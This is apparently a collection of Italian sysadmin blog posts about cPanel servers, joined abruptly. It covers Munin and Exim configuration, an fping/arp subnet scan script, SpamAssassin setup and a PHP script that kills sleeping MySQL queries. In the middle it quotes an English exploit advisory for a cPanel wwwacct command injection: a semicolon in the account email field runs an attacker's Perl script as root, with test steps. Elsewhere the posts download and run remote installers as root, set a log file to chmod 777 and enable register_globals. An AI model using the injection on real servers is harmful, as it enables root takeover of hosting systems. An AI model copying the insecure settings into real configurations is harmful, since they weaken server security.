Per ovviare a questo problema, editiamo il fil /etc/munin/plugin-conf.d/cpanel.conf e inseriamo queste direttive nella sezione [mysql]

env.mysqladmin /usr/bin/mysqladmin
env.mysqlopts –defaults-extra-file=/root/.my.cnf

il risultato sarà questo:
[mysql*]
user root
group wheel
env.mysqladmin /usr/bin/mysqladmin
env.mysqlopts –defaults-extra-file=/root/.my.cnf

Successivamente riavviate munin: /etc/init.d/munin-node restart

In genere, tute le macchine hanno il ping-reply attivo: per vedere se è online, basta effettuare un ping all’host della macchina per vedere se è attiva.

Possiamo sfruttare, per questo, un comando poco conosciuto ma molto utile in linux: fping.

Non è presente, in genere, nei repository delle solite distribuzioni ma si può trovare, ad esempio, nel rpmforge per Centos/Redhat oppure mirror alternativi. Se non si sa dove prenderlo, basta scaricare i sorgenti e compilarlo.

Fping, come dice l’help, serve ad eseguire un ping su una determinata subnet che può essere specificata in due modi: con la corretta subnet (10.0.0.0/16) oppure in un intervallo (10.0.0.1 10.0.0.255).

Per ricavare il mac-address, possiamo utilizzare l’utilissimo comando arp che serve, appunto, a ricavare il mac-address a partire da un indirizzo IP (lookup).

Chiaramente, per funzione, la macchina da cui si lancia il comando arp DEVE essere sulla stessa rete della subnet altrimenti il lookup non funziona (se passa per un router, chiaramente, il mac-address non verrà visto).

Allora, per fare una combinazione di questi comandi, ho creato uno script in bash per fare questo lavoro:

#!/bin/bash
# coded by morphey (morphey@morphey.org)

FILE_OUT="/root/out_fpingtoarp.txt"

rm -f $FILE_OUT
function FPingToArp() {
	for IP in `fping -c1 -g $1|cut -d " " -f 1-1`
	do
	STRING="$IP `arp -n $IP|grep -v HWtype|awk {'print $3'} `"
	echo $STRING >> $FILE_OUT
	done
}

#### MODIFICARE QUI ###########

FPingToArp 10.0.2.1/24

###############################

echo;echo;echo "done."

Come si vede, all’interno del codice è possibile lanciare il comando interno FPingToArp quante volte si vuole. Il resto del codice è abbastanza chiaro
Da modificare anche il FILE_OUT per avere il responso in qualsiasi file che si vuole.

P.S. nel caso si vuole copiare ed incollare il codice sopra, ricordatevi che wordpress mette delle virgolette che bisogna eliminare

Ecco la descrizione (in inglese) dell’exploit:

By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir
Vendor : Cpanel.net
Version : ALL !!
Risk : Very high
What u can do with this bug is :
u can have a access to all the server with reseller privilege (Th3 r00t)
how it’s work ?
when u want to create an account in shell what will happen ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
that u can run it with a web base program ! ( cpanel : doamin:2086)
example :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on the web base program.what u need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1

Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old=’/home/user/public_html/test.txt’;
$new=’/home/root/kon.txt’;
rename $old, $new;
++++++++++++++++++++++++++
step 2

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3

create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the “create” button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit’s or everything that u want).

Se non esiste, creiamo la cartella /usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/
Possiamo sostituire “std” con “ssl” se vogliamo modificare il virtualhost “solo” per l’ssl.
Se usiamo apache 1.x dobbiamo cambiare il “2” con “1“.

Creiamo un file di nome user.conf (o di qualsiasi altro nome, l’importante è che risulta l’estensione .conf).

In questo file mettiamo le direttive specifiche per questo dominio in modo che prende le variabili personalizzate del php.ini da un altro file.

Nell’esempio, vogliamo attivare il register_globals solo per questo dominio.
Il mod_suphp permette di personalizzare questo path con la direttiva “suPHP_ConfigPath“:

### /usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/user.conf

<IfModule mod_suphp.c>
suPHP_ConfigPath /usr/local/Zend/register-enabled
</IfModule>

In questo modo, riavviando apache (non lo facciamo ora pero’), il virtualhost andra’ a cercare il php.ini dentro la directory /usr/local/Zend/register-enabled creata ad hoc:

mkdir -p /usr/local/Zend/register-enabled
touch /usr/local/Zend/register-enabled/php.ini

Nel file /usr/local/Zend/register-enabled/php.ini metteremo, quindi, la direttiva per l’attivazione di register_globals:

## /usr/local/Zend/register-enabled/php.ini
register_globals = On

Prima di riavviare apache, dobbiamo istruirlo per far includere i files appena creati.
Per fare questo lanciamo il seguente comando:

/scripts/ensure_vhost_includes –user=UTENTE

Al termine, possiamo riavviare apache e il lavoro e’ finito.

Per curiosita’ e verifica, possiamo editare /usr/local/apache/conf/httpd.conf e vedere nel virtualhost del dominio se effettivamente le modifiche hanno avuto effetto.
Possiamo notare:

Include “/usr/local/apache/conf/userdata/*.conf”
Include “/usr/local/apache/conf/userdata/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/*.conf”
Include “/usr/local/apache/conf/userdata/std/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/2/*.conf”
Include “/usr/local/apache/conf/userdata/std/2/*.owner-root”
Include “/usr/local/apache/conf/userdata/std/2/UTENTE/*.conf”
Include “/usr/local/apache/conf/userdata/std/2/UTENTE/DOMINIO.EST/*.conf”

Stiamo parlando dell’abilitazione di Spamassassin per tutti gli account in un solo colpo.

E’ vero che abbiamo nella sezione “Exim configuration editor” la possibilità di flaggare “SpamAssassin: Enable for all users without the option for users to shut off per account”: questo fa si che venga abilitato spamassassin su tutti gli account, ma è anche vero che disabilita di fatto il pulsante “Disable spamassassin” nel singolo cPanel dell’utente impedendo a quest’ultimo di scegliere se abilitarlo o meno.

Spizzando il forum di cPanel ho trovato un post molto interessante che ho testato personalmente.

Creiamo su /root/ il file enabless.sh con questo contenuto:

#! /bin/sh
M_FILENAME=$1
#echo $M_FILENAME
M_USERNAME=`find $M_FILENAME -printf %f`
#echo $M_USERNAME

touch /home/$M_USERNAME/.spamassassinenable
chown $M_USERNAME.$M_USERNAME /home/$M_USERNAME/.spamassassinenable
touch /home/$M_USERNAME/.spamassassinboxenable
chown $M_USERNAME.$M_USERNAME /home/$M_USERNAME/.spamassassinboxenable

echo $M_USERNAME complete
echo

Impostiamo il chmod del file a 700.

Lanciamo questo comando:

find /var/cpanel/users -type f -exec /root/enabless.sh {} \;

Questo creerà per ogni account utenti i files .spamassassinenable e .spamassassinboxenable ciò che serve per abilitare automaticamente spamassassin.

Dal sito di Server Monkeys :

• Install RKHunter
• Install RKHunter Cronjob which emails a user-set email address nightly
• Install/update APF
• Add SM/TP monitoring IPs (view information on these in Orbit)
• Install/update BFD
• Install CHKROOTKIT
• Install CHKROOTKIT Cronjob which emails a user-set email address nightly
• Disable Telnet
• Force SSH Protocol 2
• Secure /tmp
• Secure /var/tmp
• Secure /dev/shm
• Install/update Zend Optimizer
• Install/update eAccelerator
• MySQL 4.0 and 4.1 Configuration Optimization (cPanel only)
• Upgrade MySQL to 4.1 (cPanel only)
• Tweak WHM Settings for security and stability
• Configure RNDC if not already done (cPanel only)
• Change SSH port (also configure APF as necessary)
• Add wheel user and disable direct root login over SSH
• Optimize MySQL tables
• Install/update Libsafe
• Install/update ImageMagick (from latest source)
• Uninstall LAuS
• Harden sysctl.conf
• Install Chirpy’s Free Exim Dictionary Attack ACL
• And more!

Tutto questo compatibile con:

• Red Hat Linux 9
• Red Hat Enterprise Linux 3, 4
• Fedora Core 1, 2, 3, 4
• CentOS 3, 4

Lo script è progettato per essere utilizzato su qualsiasi sistema linux nonchè offre un pieno supporto a cPanel e DirectAdmin.

Per installarlo, basta eseguire da root:

wget –output-document=installer.sh http://servermonkeys.com/projects/els/installer.sh; chmod +x installer.sh; sh installer.sh

Chi ha attive le quote sulla macchina linux (parlo per gli utenti di cPanel) ha potuto constatare che per un bug di spamassassin ancora non corretto, se un utente ha lo spazio sul proprio account esaurito, spamassassin va in overload facendo piantare di fatto la macchina.

Tutto questo perchè, a quota esaurita, se un utente riceve ancora email (che chiaramente vengono inviate indietro con il messaggio “Mailbox is full”) il file .spamassassin presente nel suo account rimane letteralmente bloccato facendo freezare di fatto il processo di spamd associato portando inesorabilmente il load della macchina a livelli molto alti compromettendone la stabilità e gli altri servizi.

Per risolvere il problema gli sviluppatori di cPanel hanno fatto loro stessi una patch che sembra risolvere a metà il problema.

La soluzione più ovvia è quella di patchare spamd come dicono loro.

Prima di tutto eliminiamo tutti i files .spamassassin (non preoccupatevi, sono files temporanei di spamd per ogni utente) in modo da liberare spazio su tutti gli account:

find /home -name .spamassassin | xargs rm -rf

L’operazione può richiedere alcuni minuti.
Infine patchamo spamd e lo riavviamo in questo modo:

/scripts/autorepair spamd_dbm_fix
/scripts/restartsrv_exim

L’errore che troviamo nell’exim_maillog è generalmente questo:

2008-01-06 12:39:04 1JBTqJ-0008Eo-Mp <= info@www.miodominio.it H=localhost [127.0.0.1] P=esmtpa A=fixed_login:info@miodominio.it S=1372 id=20080106123903.tk8fn2utwgksg8w8@www.miodominio.it
2008-01-06 12:39:04 1JBTqJ-0008Eo-Mp == indirizzo@tiscali.it R=lookuphost T=remote_smtp defer (-53): retry time not reached for any host

Questo problema, pultroppo, ancora non è stato risolto completamente dagli sviluppatori di cPanel.

Per risolvere, è necessario cambiare il file di configurazione di exim (exim.conf).

Chiaramente non è possibile cambiare direttamente l’exim.conf in quanto, al prossimo aggiornamento di cPanel, tutte le impostazioni verranno perse. Per questo bisogna cambiarle tramite il WHM.

Andiamo alla voce “Exim Configuration Editor” e clicchiamo su “Advanced Editor” a fine pagina.

Nel primo box (mi raccomando, il primo!) inseriamo questi parametri:

queue_only_override = false
no_message_logs
log_selector = +arguments +subject
timeout_frozen_after = 2d
ignore_bounce_errors_after = 1d
deliver_queue_load_max=10

Salviamo (verrà riavviato in automatico exim) e dovremmo avere risolto il problema.
Per aumentare le possibilità di consegna, bisogna attivare anche le blacklist sempre dall’”Exim Configuration Editor“.

Se ci sono siti progettati male (e, credetemi, ce ne sono!) molti programmatori non fanno attenzione ad ottimizzare le proprie query.

La situazione che si crea, è quella di trovarsi il load alto della macchina e, facendo un mysqladmin proc da root, ci troviamo di fronte una marea di query in sleep.

Ho aggirato il problema, facendo questo script che posto di seguito.

In pratica ad intervalli di tempo stabiliti (di default ogni 60 secondi) killa le query in sleep che sono, appunto, in sleep per più di 60 secondi.

Ma passiamo al codice.

File: mysql_sleep_query_kill.php

// Mysql sleep kill

//                     * coded by morphey (morphey@morphey.org)

//

// AVVISO: deve essere avviato via cron come utente "root" (uid=0)

// ottimizzato per cPanel

// Configurazione: ___________________________|

// $sleep_time = Impostare i secondi dopo i quali, se la query e' in sleep, si killera' automaticamente la query

$sleep_time = "60";

// $times = Impostare quante volte eseguire lo script | 0 = infinito (rimane in bg)

$times = 1;

// $times_sleep = Impostare quanto tempo far passare prima dell'avvio di un ciclo

$times_sleep = "1";

// $file_log = Impostare il file di log (percorso "assoluto" compreso) | sara' utilizzato per l'invio delle email

$file_log = "/var/log/mysql_kill_query.log";

$database_skip = array();

// $database_skip[] = Impostare i database da far saltare al controllo

$database_skip[] = "eximstats";

$database_skip[] = "horde";

//___________________________________|

function scriviLog($somecontent) {

global $file_log;

$filename = $file_log;

if (!is_file($filename)) { shell_exec("touch ".$filename." ; chmod 777 ".$filename); }

if (!is_writable($filename)) { shell_exec("chmod 777 ".$filename); }

$handle = fopen($filename, 'a');

fwrite($handle, $somecontent."\n");

fclose($handle);

}$active_times = 0;

while ($active_times<=$times) {

$out = shell_exec("mysqladmin proc");

$c = 0;

foreach (explode("\n",$out) as $linea) {

if (!eregi("-+-",$linea)) {

if ($c!=0) {

$arr = explode("|",trim($linea));

if ($arr[1]!="") {

$time = intval(ltrim(rtrim($arr[6])));

settype($time,"integer");

$id = ltrim(rtrim($arr[1]));

$user = ltrim(rtrim($arr[2]));

$database = ltrim(rtrim($arr[4]));

$command = ltrim(rtrim($arr[5]));

$state = ltrim(rtrim($arr[7]));

$query = ltrim(rtrim($arr[8]));

echo "ID->".$arr[1]." | Time->".$arr[6]." | User->".$arr[2]." | Query->".$query;

if ($time>=$sleep_time) {

$check_db = 0;

foreach ($database_skip as $db_skip) {

if ($database==$db_skip) { $check_db = 1; }

}

if ($check_db!=1) {

// struttura dei log

// id,user,database,command,state,times,query

scriviLog(date("d-m-Y_G.i.s",time()).",".$id.",".$user.",".$database.",".$command.",".$state.",".$time.",".$query);

shell_exec("mysqladmin kill ".$arr[1]);

echo " ==> killed!";

}

}

echo "\n";

}

} else { $c++; }

}

}

if ($times!=0) { $active_times++; }

if ($times!=0) {

if ($active_times<$times) {

sleep($times_sleep);

echo "[sleep->".$active_times."] for ".$times_sleep." seconds...\n";

}

}

}

?>

Per semplificare le cose, questo è il codice da lanciare a mano da root:

cd /root ; rm -rf morphtool ; mkdir morphtool ; cd morphtool
wget http://wiki.morphey.org/images/8/8b/Mysql_sleep_query_kill.zip
unzip Mysql_sleep_query_kill.zip ; rm -f Mysql_sleep_query_kill.zip
rm -rf php.ini ; touch php.ini
echo "* * * * * cd /root/morphtool ; php -c php.ini mysql_sleep_query_kill.php > /dev/null &" >> /var/spool/cron/root

This article in english version

La procedura è molto semplice ed è valida anche per altre direttive di php.ini.

Prima di tutto, creiamo la directory /usr/local/Zend/register-enabled e creiamo un php.ini vuoto:

mkdir -p /usr/local/Zend/register-enabled
touch /usr/local/Zend/register-enabled/php.ini

Fatto questo editiamo /usr/local/Zend/register-enabled/php.ini e inseriamo dentro la direttiva:

register_globals = On

Ora editiamo /etc/httpd/conf/httpd.conf e andiamo nel virtual host del dominio (es. miodominio.it) ed inseriamo tra i tag <IfModule mod_suphp.c> … </IfModule> queste direttive:

suPHP_ConfigPath /usr/local/Zend/register-enabled

In questo modo abbiamo il register_globals attivo sul singolo account.

Ulteriori info